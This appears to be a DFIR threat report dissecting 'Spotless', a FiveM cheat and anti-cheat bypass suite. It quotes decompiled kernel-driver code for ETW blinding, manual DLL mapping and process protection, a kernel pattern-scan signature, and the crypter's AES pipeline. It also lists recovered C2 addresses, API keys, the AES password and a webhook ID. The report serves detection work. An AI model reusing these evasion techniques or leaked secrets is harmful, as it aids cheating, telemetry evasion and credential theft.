Paid Engagement·Bypass Detection·Kernel Evidence·Jun 5, 2026

Spotless Bypass — Detection Report

A client paid us to investigate this. We are not disclosing the reason. Everything documented here — every string, every function, every credential — came directly from the files. This report is for server administrators, DFIR practitioners, and anti-cheat researchers only.

Spotless is a full-stack FiveM anti-cheat bypass: a kernel driver that blinds ETW and manually maps DLLs, an auth module that steals Discord tokens and can BSOD banned machines, a custom AES encryptor whose key is sitting in plaintext in the binary, a launcher with 28 FiveM process target strings, and an injector DLL with a tighter 16-target build map. The decrypt workflow did not come from a private conversation. The developer left the instructions sitting inside crypt.exe: Portuguese UI strings tell operators to drag payloads onto the crypter, and the AES key, salt, and CBC pipeline appear beside those instructions. Everything below comes from the recovered Spotless file set, archive notes, and validation of the local decrypt behavior.

Kernel Driver

neguin.sys · VolCache

Token Theft

Discord · 3 variants

BSOD Capable

NtRaiseHardError

crypt.exe Leak

AES key · PT-BR UI

Research Dossier

Evidence Set

11 files / 80 MB

Every user-requested file is represented with parsed metrics and findings.

C2

93.127.141.9:5000

DmcAuth / TZProject infrastructure and auth endpoints.

Crypto

AES-256-CBC

Instructions and key recovered from crypt.exe, not a private tip.

FiveM Map

28 process strings

bananacomleite.exe covers builds 1604 through 3570 plus generic names.

Executive Summary

Kernel Capability

Unsigned driver, manual mapping, ETW blinding, process protection, and file hiding.

neguin.sys exposes \Device\VolCache, maps DLLs into FiveM, steals a SYSTEM token by copying the PID 4 token, strips VM access through ObRegisterCallbacks, and hides prefetch, WER, and crash-dump artifacts.

Credential Theft

Discord token harvesting is built into the auth module.

MB.dll scans Discord, Discord PTB, and Discord Canary LevelDB folders, pulls token material, collects public IP and computer identifiers, then posts activity to a hardcoded Discord webhook and C2.

Destructive Enforcement

Banned machines can be forced into a BSOD.

When the backend returns banned, the module dynamically resolves RtlAdjustPrivilege and NtRaiseHardError, enables shutdown privilege, and crashes the system with 0xc0000420.

Crypto Failure

crypt.exe documents the workflow and stores the key material in the binary.

The Portuguese UI tells operators to drag a payload onto Crypter.exe for in-place encryption or decryption. The binary also contains the AES password, DmcAuth-salt, SHA-256 KDF, and CBC mode strings.

At a glance

Built by at least three distinct developer/build identities: TZX for the launcher, Gun / KCustom for payload DLLs, and swift for the fivem-spoofer driver-loader lineage.
Live C2 observed at 93.127.141.9:5000, with api.tzproject.com and tzproject.com crossover.
The file-backed evidence confirms C2 credentials, endpoints, webhook paths, and DmcAuth/TZProject strings.
MB.dll contains SpotlessPriv2026, tying the private/VIP build to the Spotless branding.
All tier folders share the same code; tiering is enforced server-side.
fulano.dll targets 16 FiveM process names; bananacomleite.exe carries a broader 28-string launcher map.

File Inventory & Hashes

bananacomleite.exePE32+ x64 EXEfrom analysisMain launcher/UI, libcurl networking, ImGui, D3D11.
bufa.dllPE32+ x64 DLLfrom analysisDriver loader, hardware virtualizer, cleaner, WinHTTP auth.
neguin.sysPE32+ x64 SYSfrom analysisKernel driver for manual mapping, token copy, ETW blinding, hooks.
fulano.dllPE32+ x64 DLLfrom analysisCheat module v1 with aimbot, flickbot, silent aim, triggerbot, ESP.
v3.dllPE32+ x64 DLL87ec3469742c973ddd2326a20cb62089Cheat module v3 with ElectronAC bypass, ESP, exploits, radar.
crypt.exePE32+ x64 EXEec7409f6b4d8a65f32a2f15d89efc7c1AES-CBC encryptor/decryptor for payload distribution.
kCUGOZADO.dllEncrypted payload6b2e7faf8f34be92aada35360c37fd49Auth, spoofer, injector payload for CTM/PBL/PVT/SLT variants.
1kCUGOZADO.dllEncrypted payloadidentical code to kCUGOZADOBulk-license variant with shared C2 configuration.
MB.dllPE32+ x64 DLLunique buildPrivate/VIP tier auth, C2, Discord token theft, BSOD enforcement.

Variant folders CTM, PBL, PVT, and SLT share identical loader code. The visible tier labels are mostly packaging; enforcement happens through the backend. MB.dll is the outlier and carries the private string SpotlessPriv2026.

Evidence Corpus — All 11 Requested Files

This audit pass was run directly over the requested Spotless files in the research archive. Each card below lists parsed function count, string-table count, import count, core PE sections, and evidence that appears in that specific file. The section is scoped to the exact eleven files requested for the page update.

80 MB

DECOMP text reviewed

19,824

function entries

16,572

string-table entries

DECOMP_bananacomleite.exe.txt

bananacomleite.exe · launcher / UI

20.35 MB

5,780

Funcs

4,024

Strings

258

Imports

Largest DECOMP export in the set. It combines a user-facing ImGui launcher, libcurl networking, TLS public-key pinning, GPU-friendly exports, and the widest FiveM process map.

Sections

.text 0x215800 · .rdata 0x6c400 · .data 0x15839c · .fptable 0x200

  • Exports NvOptimusEnablement and AmdPowerXpressRequestHighPerformance and imports D3D11CreateDevice plus DwmSetWindowAttribute for the launcher surface.
  • String table includes libcurl 8.2.1-DEV, nlohmann/json 3.11.2 type names, sha256// public-key pinning, and CRYPT32 certificate-chain APIs.
  • Developer path and PDB artifacts point to D:\Projets\TZX\TZX\ and D:\Projets\TZX\x64\Release\Module.pdb.
  • Reads CitizenFX.ini and packages.json and carries 28 FiveM process strings covering builds 1604 through 3570 plus generic GameProcess/GTAProcess names.

DECOMP_bufa.dll.txt

bufa.dll · bypass core / driver loader

4.87 MB

1,255

Funcs

312

Strings

206

Imports

Operational bypass layer that bridges user mode into the driver and performs filesystem, registry, crypto, session, and cleanup activity.

Sections

.text 0x9e600 · .rdata 0x1b200 · .data 0xd744 · .tls 0x200

  • Imports DeviceIoControl, FindFirstFile variants, WTSGetActiveConsoleSessionId, SHGetFolderPathA, CryptAcquireContextA, CryptDeriveKey, CryptEncrypt, and CryptDecrypt.
  • PDB strings expose \etw_hook\outputs\x64\Release\BFDriverLoader.pdb and, at 1800be878, C:\Users\swift\Documents\pastes\fivem-spoofer\spoofer-drv\build\kernel_hook.pdb.
  • High-signal strings include HalPrivateDispatchTable, Circular Kernel Context Logger, CitizenFX, and a Session Manager\Memory Management registry path.
  • The embedded compiler banner says Welcome to use llvm-msvc; swft/1.0 appears at 1800aebce and is passed into WinHttpOpen, tying runtime network traffic back to the swift PDB handle.

DECOMP_crypt.exe.txt

crypt.exe · AES payload crypter

0.38 MB

174

Funcs

167

Strings

124

Imports

Small standalone encrypt/decrypt utility. It has no network stack; its behavior is dominated by BCrypt, command-line drag/drop parsing, and Portuguese status dialogs.

Sections

.text 0x6400 · .rdata 0x3c00 · .data 0xb70 · .pdata 0x800

  • Imports BCryptOpenAlgorithmProvider, BCryptCreateHash, BCryptHashData, BCryptFinishHash, BCryptGenerateSymmetricKey, BCryptEncrypt, and BCryptDecrypt.
  • Plaintext key material and crypto constants appear in strings: ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS, DmcAuth-salt, SHA256, ChainingModeCBC, and ChainingMode.
  • The Portuguese UI tells operators to drag a file onto Crypter.exe and says the file will be encrypted or decrypted in place with the same extension.
  • Success/error strings include Arquivo descriptografado com sucesso, Arquivo criptografado com sucesso, Erro na descriptografia, and Erro na criptografia.

DECOMP_fulano.dll.txt

fulano.dll · injector / cheat module

11.74 MB

3,207

Funcs

1,777

Strings

301

Imports

Large injector and cheat module with D3D overlay code, process-memory APIs, a FiveM build matrix, and explicit aim/trigger feature labels.

Sections

.text 0x473a00 · .rdata 0x278800 · .data 0x57d8 · .pdata 0xae00

  • Imports D3D11CreateDeviceAndSwapChain, D3DX11CreateShaderResourceViewFromMemory, VirtualAllocEx, MapViewOfFile, UnmapViewOfFile, LoadLibraryA, and GetProcAddress.
  • Feature strings include Aimbot, Silent Aim, Trigger Bot, Aimbot > FlickBot, Disable aimbot while flashed, and Disable aimbot through smoke.
  • Additional overlay strings include Vehicles ESP, Radar, Weapon, FiveM Duplicate, and the 0xfde9 code-page conversion path used around file/open helpers.
  • The 16-process FiveM map targets builds 2802, 2944, 3095, 3323, 3407, 3570, and 3751 across GameProcess and GTAProcess names.
  • Spotless branding appears in the UI strings, while the large .rdata block also carries weapon-name tables used by the overlay and targeting menus.

DECOMP_kCUGOZADO_CTM.dll.txt

kCUGOZADO_CTM.dll · CTM tier loader

5.49 MB

1,249

Funcs

1,280

Strings

325

Imports

CTM build with shared DmcAuth C2, login/session flow, webhook logging, BSOD-capable ban enforcement, and an aaaa\KCustom development path.

Sections

.text 0xd0a00 · .rdata 0x23800 · .data 0x12fff0 · .pdata 0x3400

  • Strings include http://93.127.141.9:5000, FTaC7sHRNwKbrMYR, 470752974bfe5c36, /api/ep/hwid-whitelist-check, /api/ep/init, /api/keys/use, and /api/blacklist/check.
  • TZX crossover is active in strings and code: api.tzproject.com and tzproject.com are present and copied into stack buffers with builtin_strncpy.
  • Ban enforcement strings and imports include RtlAdjustPrivilege, NtRaiseHardError, BANNED, banned, and webhookUrl.
  • Runtime markers include \\.\VolCache, C:\Windows\System32\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, and swft/1.0 passed to WinHttpOpen.
  • Build path exposes C:\Users\Gun\Desktop\aaaa\KCustom\Kernel-UI-Protected\ext\backends\imgui\.

DECOMP_kCUGOZADO_PBL.dll.txt

kCUGOZADO_PBL.dll · public tier loader

5.61 MB

1,227

Funcs

2,721

Strings

327

Imports

Public-tier build. It keeps the same auth, webhook, TZX, D3D11, WTS, registry, crypto, and driver-IOCTL shape, but its build path names the public package.

Sections

.text 0xd3000 · .rdata 0x23c00 · .data 0x197db0 · .pdata 0x3600

  • Shares the 93.127.141.9:5000 C2, 470752974bfe5c36 salt, /api/ep/hwid-whitelist-check, /api/ep/init, /api/keys/use, and /api/blacklist/check.
  • Login strings enforce Discord ID and password lengths of 17 to 21 characters and display Login failed / Invalid session outcomes.
  • Runtime strings include \\.\VolCache, C:\Windows\System32\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, api.ipify.org, and swft/1.0.
  • IOCTL scan includes 0x00222004, 0x80002000, and 0x00222418 in the same driver-control family as CTM, PVT, SLT, MB, and neguin.sys.
  • Build path leaks C:\Users\Gun\Desktop\Kernel-Spotless\KPublic\Kernel-UI-Protected\ext\backends\imgui\.

DECOMP_kCUGOZADO_PVT.dll.txt

kCUGOZADO_PVT.dll · private tier loader

5.59 MB

1,263

Funcs

1,280

Strings

324

Imports

Private-tier build with the same auth spine and destructive ban pathway. Its strongest differentiator is the KPrivate development path.

Sections

.text 0xd2e00 · .rdata 0x23c00 · .data 0x130040 · .pdata 0x3600

  • Contains http://93.127.141.9:5000, 470752974bfe5c36, /api/ep/hwid-whitelist-check, webhookUrl, api.ipify.org, discord.com, and the hardcoded Discord webhook path.
  • Login and session strings match the other loaders: Discord ID, password length checks, Login failed, Invalid session, /api/ep/init, sessionid, /api/keys/use, and /api/blacklist/check.
  • Imports CreateRemoteThreadEx, WriteProcessMemory, WTSQueryUserToken, RegOpenKeyExW, RegSetValueExW, CryptDeriveKey, CryptDecrypt, and D3D11CreateDeviceAndSwapChain.
  • Runtime strings include \\.\VolCache, C:\Windows\System32\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, and swft/1.0 passed to WinHttpOpen.
  • Build path leaks C:\Users\Gun\Desktop\Kernel-Spotless\KPrivate\Kernel-UI-Protected\ext\backends\imgui\.

DECOMP_kCUGOZADO_SLT.dll.txt

kCUGOZADO_SLT.dll · slotted tier loader

5.48 MB

1,255

Funcs

1,279

Strings

324

Imports

Slotted build. Function counts and imports line up closely with CTM/PVT, while path artifacts identify the Slotted branch.

Sections

.text 0xd0a00 · .rdata 0x23800 · .data 0x130000 · .pdata 0x3400

  • C2/auth strings include http://93.127.141.9:5000, 470752974bfe5c36, /api/ep/hwid-whitelist-check, /api/ep/init, /api/keys/use, and /api/blacklist/check.
  • The same ban and telemetry vocabulary appears: RtlAdjustPrivilege, NtRaiseHardError, BANNED, api.ipify.org, discord.com, webhookUrl, and banned.
  • Contains api.tzproject.com and tzproject.com, with copied stack-buffer call sites for api.tzproject.com.
  • Runtime strings include \\.\VolCache, C:\Windows\System32\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, and swft/1.0 passed to WinHttpOpen.
  • Build path leaks C:\Users\Gun\Desktop\aaaa\Slotted\Kernel-UI-Protected\ext\backends\imgui\.

DECOMP_MB.dll.txt

MB.dll · private auth / C2 module

5.45 MB

1,240

Funcs

1,263

Strings

322

Imports

Private/VIP control module. It carries the most explicit Spotless private identifier and repeats the auth, webhook, BSOD, TZX, and process-hollowing surfaces.

Sections

.text 0x84400 · .rdata 0x21c00 · .data 0x12fdb8 · .pdata 0x3400

  • Strings include http://93.127.141.9:5000, FTaC7sHRNwKbrMYR, 470752974bfe5c36, SpotlessPriv2026, /api/ep/hwid-whitelist-check, /api/ep/init, and /api/keys/use.
  • Ban enforcement is explicit: RtlAdjustPrivilege, NtRaiseHardError, BANNED, banned, and a hardcoded Discord webhook path are all present.
  • Authentication UI strings enforce numeric Discord ID and password ranges of 17 to 21 characters, then track sessionid and Invalid session states.
  • Runtime bridge strings include \\.\VolCache, C:\Windows\System32\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, api.ipify.org, and swft/1.0 passed to WinHttpOpen.
  • TZX strings are present at api.tzproject.com and tzproject.com, and SpotlessPriv2026 is copied multiple times into data buffers.

DECOMP_neguin.sys.txt

neguin.sys · kernel driver

0.28 MB

82

Funcs

208

Strings

67

Imports

Small but high-impact kernel driver. The export confirms ETW tampering, VolCache disguise, manual mapping, process protection, file hiding, and a usermode DLL target.

Sections

.text 0x6000 · .rdata 0x1000 · .data 0x4f98 · INIT 0x800

  • Imports ZwTraceControl, ZwSetSystemInformation, ZwQuerySystemInformation, IoCreateDriver, IoCreateDevice, IoCreateSymbolicLink, PsSetCreateProcessNotifyRoutine, and PsLookupProcessByProcessId.
  • Device strings create \Device\VolCache and \DosDevices\VolCache, with a matching \Driver\VolCache marker.
  • IOCTL scan includes 0x00222004 for manual map, 0x80002000 for token-copy logic, 0x00222414 to enable file hooks, and 0x00222418 to disable file hooks.
  • Hiding and anti-analysis strings include Circular Kernel Context Logger, KiSystemServiceRepeat, \PREFETCH\, \PROGRAMDATA\MICROSOFT\WINDOWS\WER\REPORTARCHIVE\, \APPDATA\LOCAL\CRASHDUMPS\, and netcom.dll.
  • Additional development residue includes packages.json and C:\projects\hello-world-dll\Release\x64\hello-world.pdb, plus ObRegisterCallbacks and PsSetCreateProcessNotifyRoutine imports.

DECOMP_v3.dll.txt

v3.dll · main cheat engine

15.23 MB

3,092

Funcs

2,261

Strings

197

Imports

Main cheat engine with a recent build timestamp, ImGui/D3D11 overlay stack, fptable pointer storage, and extensive ESP/radar/aimbot UI strings.

Sections

.text 0x2afe00 · .rdata 0x363000 · .data 0xf4eac · .fptable 0x200

  • Imports D3D11CreateDeviceAndSwapChain and stores a writable .fptable section at 0x180715000 with size 0x200.
  • Build and framework strings include May 29 2026 16:29:35 and Dear ImGui 1.91.3 WIP (19121).
  • Feature strings include Show Players, Electron Bypass, Enable Skeleton, Enable Box, Enable Radar, Radar Show Players, Silent Aim, Triggerbot, and Aimbot.
  • Additional UI artifacts include FiveMProjectorCursor_v2, FiveMProjector_v3, MaterialIconsOutlined-Regular, and Inter Bold 3.019 font metadata.
  • The UI paths construct those strings inside menu functions, showing the strings are used in rendered configuration screens rather than dead data.

Cross-file conclusion

The requested corpus ties the suite together from three angles: launcher targeting in bananacomleite.exe, usermode loader/auth behavior in bufa.dll, MB.dll, and the four kCUGOZADO_* tier builds, then kernel capability in neguin.sys. The same C2/auth strings, TZX domains, Discord webhook path, process-hollowing imports, driver IOCTLs, and FiveM process targets recur across the set, while the tier-specific build paths expose CTM, public, private, and slotted packaging. Attribution is broader than TZX/Gun: DECOMP_bufa.dll.txt also exposes the swift handle through a fivem-spoofer kernel_hook.pdb path, and swft/1.0 is reused as the WinHTTP user-agent in the loader family.

Developer Intelligence

Developer 1

TZX

Project path: D:\Projets\TZX\TZX\

Role: Built bananacomleite.exe, the frontend launcher and UI layer.

Stack: C++, Dear ImGui, libcurl 8.2.1-DEV, D3D11, nlohmann/json 3.11.2.

Developer 2

Gun / KCustom

Project path: C:\Users\Gun\Desktop\aaaa\KCustom\Kernel-UI-Protected\

Role: Built payload DLLs including kCUGOZADO.dll, MB.dll, and 1kCUGOZADO.dll.

Branding: Spotless External, Spotless V3, KCustom, TZProject / DmcAuth.

Developer 3

swift / swft

PDB path: C:\Users\swift\Documents\pastes\fivem-spoofer\spoofer-drv\build\kernel_hook.pdb

Role: Separate fivem-spoofer driver-loader lineage pulled into bufa.dll.

Runtime marker: swft/1.0 appears as a WinHTTP user-agent in bufa.dll, MB.dll, and the kCUGOZADO_* loaders.

The swift attribution is file-backed, not a guess: DECOMP_bufa.dll.txt contains C:\Users\swift\Documents\pastes\fivem-spoofer\spoofer-drv\build\kernel_hook.pdb at 1800be878, while swft/1.0 appears at 1800aebce and is passed into WinHttpOpen. The same user-agent string also appears in DECOMP_MB.dll.txt and the CTM/PBL/PVT/SLT loader exports, so the marker propagates beyond a single DLL.

Language Indicator

Brazilian Portuguese appears across crypt.exe, hollowing errors, and naming.

The crypter uses Portuguese instructions such as Arraste o arquivo para cima do Crypter.exe, while bananacomleite.exe translates literally to “banana with milk.” The same language shows up in MB.dll process-hollowing error strings.

Full Loader Chain

1

User launches bananacomleite.exe

The launcher shows a Discord ID and password login, reads CitizenFX.ini and packages.json, authenticates with the C2, then stages bufa.dll.
2

bufa.dll escalates, cleans, and loads the driver

The bypass core runs core::virtualizer::run for HWID spoofing, core::cleaner::hardware_cleaner for ban-trace cleanup, performs WinHTTP auth using swft/1.0, then loads neguin.sys.
3

neguin.sys exposes VolCache and maps the payload

The driver creates \Device\VolCache, handles IOCTLs including 0x222004 for manual DLL mapping and 0x80002000 for SYSTEM token copy, then protects the injected process through callbacks.
4

FiveM receives the cheat modules

fulano.dll and v3.dll provide silent aim, triggerbot, ESP, radar, ElectronAC bypass logic, and exploit toggles against targeted FiveM builds.

Component Analysis

bananacomleite.exe

19.7 MB launcher with libcurl, Dear ImGui 1.92.3 WIP, D3D11, certificate pinning, and 28 FiveM process target strings.

bufa.dll

Require-admin bypass core with WinHTTP JSON auth, CryptAPI runtime crypto, driver loading, hardware spoofing, and cleaner namespaces.

neguin.sys

Unsigned VolCache-disguised kernel driver with manual map, Ob callbacks, ETW blinding, token theft, and filesystem hooks.

fulano.dll

Cheat module v1 with its own 16 FiveM process targets, file-backed mapping support, and classic aimbot/ESP structures.

v3.dll

Cheat module v3 with ElectronAC anti-ESP bypass, radar, exploit menu strings, shaders, and recent May 29 2026 timestamp.

crypt.exe

Standalone BCrypt AES-CBC crypter with Portuguese drag-and-drop UI and plaintext key material.

How We Got It

1

Client provides a DLL. We find the IP.

The client gave us a single DLL from a flagged player. Static string extraction immediately surfaced http://93.127.141.9:5000 hardcoded in the .rdata section — the live C2 API. A port scan showed port 8080 also open and serving files over plain HTTP.

2

Open file server. No auth. Everything downloadable.

Navigating to http://93.127.141.9:8080/ returned a directory listing with no credentials, no token, no IP restriction. The entire Spotless suite — nine binaries — was sitting there. We downloaded everything. This was a live distribution server pushing updates to customers.

3

Archive preserved, behavior validated.

After the suite was recovered from the open server, we preserved the files and supporting notes for detection work. The important point for this report is where the files came from and what artifacts they contain, not the private tooling used to review them.

crypt.exe Gave Away the Decrypt Workflow

DEEP_crypt.exe.txt

The decrypt procedure came from the binary itself. crypt.exe contains Portuguese UI strings instructing the operator to drag a payload onto Crypter.exe; the same utility encrypts or decrypts the file in place while preserving the extension. We confirmed the behavior locally after identifying the AES details in the file.

Key Finding

The AES encryption key is stored in plaintext in the global C++ initializer.

The global initializer function FUN_140001000 runs at startup before main(). It calls FUN_140001820 — a string copy wrapper — with the 32-byte key passed as a literal. The key is sitting in .rdata at address 0x140008718. No obfuscation, no derivation, just a string constant.

From fileDEEP_crypt.exe.txt
FUNCTION : FUN_140001000
ADDRESS  : 140001000
SIZE     : 45 bytes

void FUN_140001000(void)
{
  // Copies 32-byte AES key into global buffer DAT_14000cb40 at startup:
  FUN_140001820(&DAT_14000cb40, "ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS", 0x20);
  atexit(FUN_1400071a0);
  return;
}

// Confirmed in .rdata string table:
140008718   ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS   ← AES key (32 bytes)
140008740   SHA256                               ← hash algorithm
140008750   DmcAuth-salt                         ← KDF salt
140008768   ChainingModeCBC                      ← cipher mode
140008788   ChainingMode                         ← BCrypt property name

The file exposes the following BCrypt pipeline:

From fileDEEP_crypt.exe.txt
// Step 1 — SHA-256 KDF over the AES key + salt "DmcAuth-salt":
BCryptOpenAlgorithmProvider(&local_b0, L"SHA256", NULL, 8);
FUN_140001820(&local_58, "DmcAuth-salt");   // append salt
BCryptCreateHash(&local_b0, &local_b8, ...);
BCryptHashData(local_b8, key_buf, 0x20, 0);
BCryptFinishHash(local_b8, derived_key, 32, 0);

// Step 2 — AES-CBC symmetric key from derived bytes:
BCryptOpenAlgorithmProvider(&aes_handle, L"AES", NULL, 0);
BCryptSetProperty(aes_handle, L"ChainingMode", L"ChainingModeCBC", ...);
BCryptGenerateSymmetricKey(aes_handle, &key_handle, NULL, 0, derived_key, 32, 0);

// Step 3 — Random IV + encrypt/decrypt in place (same extension):
BCryptGenRandom(NULL, iv, 16, 2);
BCryptEncrypt(key_handle, plaintext, size, NULL, iv, 16, ciphertext, ...);
// — or —
BCryptDecrypt(key_handle, ciphertext, size, NULL, iv, 16, plaintext, ...);

The full user interface is in Brazilian Portuguese — every error message, every dialog. This is the operational note that revealed the decrypt workflow:

From fileDEEP_crypt.exe.txt
1400087c0  "Arraste o arquivo para cima do Crypter.exe."
           "O arquivo sera criptografado/descriptografado no proprio local (mesma extensao)."
           → "Drag the file onto Crypter.exe. The file will be encrypted/decrypted in place."

140008840  "Caminho do arquivo invalido."          → "Invalid file path."
140008860  "Nao foi possivel abrir o arquivo."     → "Could not open the file."
140008888  "Erro ao ler o arquivo."                → "Error reading the file."
1400088a0  "Erro na descriptografia."              → "Decryption error."
1400088c0  "Nao foi possivel escrever o arquivo."  → "Could not write the file."
1400088e8  "Arquivo descriptografado com sucesso!" → "File decrypted successfully!"
140008918  "Erro na criptografia."                 → "Encryption error."
140008930  "Arquivo criptografado com sucesso!"    → "File encrypted successfully!"

C2 Server Intelligence

Infrastructure

Direct IP bypassed Cloudflare-protected domains.

The payloads reference api.tzproject.com and tzproject.com, but the binary-backed direct C2 target is 93.127.141.9:5000. The exported strings also expose the DmcAuth-style product identifier, API key, salt, session endpoints, and Discord webhook path.

Primary IP93.127.141.9:5000
Domainsapi.tzproject.com / tzproject.com
Product ID0026d7bf
API KeyFTaC7sHRNwKbrMYR
API Salt470752974bfe5c36
Webhook ID1472751394154086491
Observed API endpoint map
POST /api/ep                         Software authentication
POST /api/ep/heartbeat               Keep-alive
POST /api/ep/info                    Key and user information
POST /api/ep/validate                Quick key validation
POST /api/ep/init                    Initialize session + version check
POST /api/ep/hwid-whitelist-check    HWID authorization
POST /api/ep/auth                    User authentication
POST /api/ep/register                User registration
POST /api/ep/upgrade                 Upgrade with new key
POST /api/ep/download                Download file
POST /api/ep/update                  Download update
POST /api/ep/change-password         Password change
POST /api/auth/login                 Panel login
POST /api/auth/register              Reseller registration
GET  /api/health                     Public server health
GET  /api/apps/list                  Application list
GET  /api/keys/lookup                Key lookup
POST /api/blacklist/check            Public blacklist check
POST /api/blacklist                  Add to blacklist
GET  /api/hwid-lists                 HWID whitelist management
GET  /api/analytics/access-logs      Access logs
GET  /api/analytics/audit-logs       Audit logs

Authentication System

Full Auth Flow

1bananacomleite.exe shows Discord ID and password login.
2Credentials are sent to 93.127.141.9:5000/api/ep/auth.
3kCUGOZADO_CTM.dll generates HWID from computer name and seed constants.
4POST /api/ep/hwid-whitelist-check returns allowed, not_in_list, suspect, or banned.
5banned status triggers NtRaiseHardError; allowed status proceeds to driver load.
6bufa.dll performs a secondary WinHTTP license check before NtLoadDriver.

Hardcoded Auth Tokens

API KeyFTaC7sHRNwKbrMYR
Product ID0026d7bf
Session Token470752974bfe5c36
AES PasswordghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS
KDF SaltDmcAuth-salt
WinHTTP UAswft/1.0

Client-Side Auth Weakness

The exports show a real crackability risk: important auth decisions are made in usermode after HTTP responses are parsed. We are not publishing binary patch recipes, offsets, or opcode-level instructions, but defenders should assume cracked Spotless builds can exist where the local client reports success without a normal server round-trip.

bufa.dll Gate

License gating depends on a client-side WinHTTP result.

bufa.dll imports the full WinHTTP chain, including WinHttpSendRequest, WinHttpReceiveResponse, WinHttpQueryDataAvailable, and WinHttpReadData. That makes missing or abnormal auth traffic a useful cracked-build hunt signal.

HWID Gate

allowed / not_in_list / banned are local response states.

MB.dll and both CTM DLLs embed allowed, not_in_list, and banned. A tampered variant may suppress failure handling or force a local success result, so defenders should hash-hunt both original and modified payloads.

Complications

Cracking auth does not remove kernel and secondary checks.

neguin.sys is unsigned and still needs a driver-loading path such as test signing, a DSE bypass, or another vulnerable-driver chain. The cheat DLLs may run secondary checks, and the driver's ObRegisterCallbacks protection can complicate usermode tampering after it is active.

Defensive cracked-variant model
Expected original behavior:
  launcher/auth DLL contacts 93.127.141.9:5000
  HWID endpoint returns allowed / not_in_list / suspect / banned
  bufa.dll performs a secondary WinHTTP license check before driver load

Plausible cracked-variant indicators:
  no C2 traffic before driver-load attempt
  WinHTTP imports present but never exercised in the auth path
  banned / not_in_list strings absent, dead, or unreachable
  changed hashes with the same VolCache, swft/1.0, DmcE, or webhook indicators

Remaining constraints:
  unsigned neguin.sys still needs a driver-loading bypass
  cheat DLLs may contain secondary auth checks
  server-side sessions still validate real HWID-bearing requests

Cheat Features (Complete)

ESP System

Player boxes, skeletons, head circles, health/armor bars, names, weapon display, distance, view angles, spectator list, tracers, vehicle ESP, radar, crosshair styles, Electron Bypass.

Aimbot

Standard aimbot, FlickBot, Silent Aim, prediction, closest-bone targeting, Triggerbot, visible checks, weapon range, miss chance, magic bullet, auto-scope, legit/rage modes.

Exploits

God Mode, Invisible, No Collision, NoClip, Infinite Ammo, No Reload, Rapid Fire, No Recoil, No Spread, Infinite Range, Vehicle God Mode, Solo Session, Auto TP, Strafe Macro.

World / Utility

Teleport presets for GTA V locations, saved custom locations, State Bags reader, Friend Helper, vehicle list, player list, friend management.

Vehicle

Horn Boost, Seat Belt, tyres do not burst, speed and health rendering, vehicle lock-state visibility.

Stream Proofing

Stream Proof mode plus anti-recording checks against NVIDIA ShadowPlay registry locations.

neguin.sys — The Kernel Driver

SPOTLESS W DRIVERneguin.sys.txt

neguin.sys is a 64-bit Windows kernel driver (x86:LE:64:default, ImageBase 0x140000000) that imports exclusively from NTOSKRNL.EXE. "Neguin" is Brazilian Portuguese slang — consistent with the rest of the suite. The driver has a .text section of 0x6000 bytes and exposes a device named \Device\VolCache — chosen to impersonate the legitimate Windows Volume Cache driver.

Kernel IOC

\Device\VolCache created by illegitimate driver

Any instance of \Device\VolCache or \DosDevices\VolCache from a driver outside C:\Windows\System32\drivers\ is a confirmed neguin.sys indicator. Visible in WinObj or System Informer.

ETW Tampering

Kernel ETW tracing blinded via HalPrivateDispatchTable

The driver patches KiSystemServiceRepeat via byte-pattern scan to intercept the Circular Kernel Context Logger — the mechanism EasyAntiCheat and BattlEye use to detect syscall-level cheat activity.

Device creation — driver entry

From fileSPOTLESS W DRIVERneguin.sys.txt
// Driver creates VolCache device to impersonate Windows Volume Cache:
RtlInitUnicodeString(local_28, L"\Device\VolCache");
IoCreateDevice(param_1, 0, local_28, 0x22, 0x100, 0, &local_res8);

RtlInitUnicodeString(local_18, L"\DosDevices\VolCache");
IoCreateSymbolicLink(local_18, local_28);

// All 28 IRP dispatch slots set to single handler FUN_1400021b0:
for (lVar3 = 0x1c; lVar3 != 0; lVar3--) {
  *puVar4 = FUN_1400021b0;
  puVar4 = puVar4 + 1;
}

ETW hook manager — blinding kernel telemetry

The driver resolves EtwpDebuggerData by reading 16 bytes into the HalPrivateDispatchTable, allocates pool memory for PMC counter configuration, then patches KiSystemServiceRepeat using a byte-pattern scan to suppress the kernel ETW syscall trace:

From fileSPOTLESS W DRIVERneguin.sys.txt
140006270  "failed to get EtwpDebuggerData!"
1400064a0  "EtwHookManager::Initialize"
1400064c0  "failed to get HalPrivateDispatchTable address!"
140006540  "failed to find KiSystemServiceRepeat"
140006570  "EtwHookManager::TraceStackToSyscall"

// ETW class names (embedded as strings):
EtwInitilizer::EtwInitilizer      — ETW context constructor
EtwInitilizer::OpenPmcCounter     — configure PMC hardware counter
EtwInitilizer::StartStopTrace     — enable/disable Circular Kernel Context Logger
EtwHookManager::Initialize        — hook KiSystemServiceRepeat
EtwHookManager::TraceStackToSyscall — redirect syscall trace output

// Pattern used to locate KiSystemServiceRepeat in kernel .text:
xx????xxx????xx????xxx????xxx????xx?

Process & thread protection — ObRegisterCallbacks

From fileSPOTLESS W DRIVERneguin.sys.txt
// Driver registers callbacks to block anti-cheat handle access:
uVar1 = ObRegisterCallbacks(&DAT_14000cf70, &DAT_14000cf20);

// When scanner tries to open handle to protected cheat process:
FUN_140001964(2, 0x140006ba0,
  "Disallow protected process access from %Iu to %Iu", uVar4);
FUN_140001964(2, 0x140006ba0,
  "Allow protected process access from %Iu to %Iu", uVar4);

// Same for threads:
"Disallow protected thread access from %Iu to %Iu"
"Allow protected thread access from %Iu to %Iu"

// After injection completes, the log entry:
"Injection Complete. Process %d is now PROTECTED (High Level)."
"Injection Complete, but failed to protect process %d. Status: %08x"

IOCTL 0x222004 — manual DLL mapping into target process

From fileSPOTLESS W DRIVERneguin.sys.txt
// IOCTL code 0x222004 triggers kernel-mode DLL injection:
if (uVar4 == 0x222004) {
  puVar2 = *(uint **)(param_2 + 0x18);   // read IOCTL input buffer
  // puVar2[0] = target PID
  // puVar2[1] = DLL buffer size
  // *(puVar2+2) = DLL buffer pointer (usermode)

  // Allocate kernel pool and copy DLL from usermode:
